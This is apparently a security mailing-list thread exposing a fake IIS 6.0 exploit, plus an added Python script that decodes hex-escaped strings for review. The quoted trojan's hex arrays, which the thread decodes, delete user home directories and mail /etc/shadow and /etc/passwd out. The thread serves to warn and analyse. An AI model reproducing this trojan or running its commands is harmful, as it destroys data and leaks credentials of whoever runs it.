http://seclists.org/fulldisclosure/2005/Apr/451
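It was said to be code that could get a shell by exploiting an IIS 6.0 vulnerability, so I tested it, and all it did was wipe out my home directory.
I can't believe I fell for fake code like this. It's driving me crazy. Sigh.
The mail was not sent, but all the user directories were deleted, which leaves me in a bad mood.
Fortunately it was run in VMware, so I do have a backup image, but I need to be careful.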
http://lists.grok.org.uk/pipermail/full-disclosure/2005-April/033472.html
THIS ADVISORY IS FALSE!!!!!!!!!!!!!!!!!!!!!!!

"shellcode" is decoded to be:
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe

"launcher" is decoded to be:
cat /etc/shadow |mail full-disclosure at lists.grok.org.uk

"netcat_shell" is decoded to be:
cat /etc/passwd |mail full-disclosure at lists.grok.org.uk

Day Jay wrote:
> /* Proof of concept code
> Please don't send us e-mails
> asking us "how to hack" because
> we will be forced to skullfsck you.
>
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
>
> IIS 6 Buffer Overflow Exploit
>
> BUG: inetinfo.exe improperly bound checks
> http requests sent longer than 6998 chars.
> Can get messy but enough testing, and we have
> found a way in.
>
> VENDOR STATUS: Notified
> FIX: In process
>
> Remote root.
>
> eg.
> #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
> + Connecting to host...
> + Connected.
> + Inserting Shellcode...
> + Done...
> + Spawining shell..
>
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
> C:>
>
>
>
> */
> char shellcode[] =
> "x2fx62x69x6ex2fx72x6dx20"
> "x2dx72x66x20x2fx68x6fx6d"
> "x65x2fx2ax3bx63x6cx65x61"
> "x72x3bx65x63x68x6fx20x62"
> "x6cx34x63x6bx68x34x74x2c"
> "x68x65x68x65";
>
> char launcher [] =
> "x63x61x74x20x2fx65x74x63x2fx73"
> "x68x61x64x6fx77x20x7cx6dx61x69"
> "x6cx20x66x75x6cx6cx2dx64x69"
> "x73x63x6cx6fx73x75x72x65x40"
> "x6cx69x73x74x73x2ex67x72x6fx6b"
> "x2ex6fx72x67x2ex75x6bx20";
>
> char netcat_shell [] =
> "x63x61x74x20x2fx65x74x63x2fx70"
> "x61x73x73x77x64x20x7cx6dx61x69"
> "x6cx20x66x75x6cx6cx2dx64x69"
> "x73x63x6cx6fx73x75x72x65x40"
> "x6cx69x73x74x73x2ex67x72x6fx6b"
> "x2ex6fx72x67x2ex75x6bx20";
>
>
> main()
> {
>
> //Section Initialises designs implemented by mexicans
> //Imigrate
> system(launcher);
> system(netcat_shell);
> system(shellcode);
>
> //int socket = 0;
> //double long port = 0.0;
>
> //#DEFINE port host address
> //#DEFINE number of inters
> //#DEFINE gull eeuEE
>
> // for(int j; j < 30; j++)
> {
> //Find socket remote address fault
> printf(".");
> }
> //overtake inetinfo here IIS_666666^
> return 0;
> }
>
>
>
>
>
> __________________________________
> Do you Yahoo!?
> Plan great trips with Yahoo! Travel: Now over 17,000 guides!
> http://travel.yahoo.com/p-travelguide
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
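The check the reply above did by hand can be scripted and run on a proof of concept before compiling it. This is an added example, not code from the original post or the list reply; the names `triage`, `decode_arrays`, `c_hex` and `SAMPLE` are assumptions of this example, and the sample input is constructed and benign. It accepts both `\x2f` escapes and the backslash-less `x2f` form in which the listing appears here.

```python
import re

# char name[] = "..." "..." ;  (adjacent C string literals in one initializer)
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"[^"]*"\s*)+);')
# A body made only of hex escapes, with or without the leading backslash.
HEX_BODY_RE = re.compile(r'(?:\\?x[0-9a-fA-F]{2})+')
# Calls that hand their argument to a shell or exec a program.
CALL_RE = re.compile(r'\b(system|popen|execl|execlp)\s*\(\s*(\w+)')

def decode_arrays(source):
    """Return {array_name: decoded bytes} for char arrays made of hex escapes."""
    out = {}
    for name, literals in ARRAY_RE.findall(source):
        body = "".join(re.findall(r'"([^"]*)"', literals))
        if HEX_BODY_RE.fullmatch(body):
            pairs = re.findall(r'x([0-9a-fA-F]{2})', body)
            out[name] = bytes(int(p, 16) for p in pairs)
    return out

def triage(source):
    """Decode every hex array and report whether it is plain text fed to a shell."""
    source = re.sub(r'(?m)^\s*(?:>\s?)+', '', source)  # drop mail quote markers
    called = {arg: fn for fn, arg in CALL_RE.findall(source)}
    findings = []
    for name, raw in decode_arrays(source).items():
        findings.append({
            "name": name,
            "text": raw.decode("latin-1"),
            # Machine code is rarely 100% printable ASCII; a shell command is.
            "printable": all(32 <= b < 127 for b in raw),
            "passed_to": called.get(name),
        })
    return findings

def c_hex(text, backslash=True):
    """Encode text as C hex escapes (helper used to build the constructed sample)."""
    prefix = "\\x" if backslash else "x"
    return "".join(f"{prefix}{b:02x}" for b in text.encode())

# Constructed sample: a quoted listing whose "payload" is a harmless echo command.
SAMPLE = (
    "> char payload[] =\n"
    f'> "{c_hex("echo constructed", True)}"\n'
    f'> "{c_hex("-sample", False)}";\n'
    "> main() { system(payload); }\n"
)

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f)
```

An array that decodes to fully printable text and is passed to `system()` is a shell command, not shellcode, and its decoded text is exactly what will run on the tester's own machine.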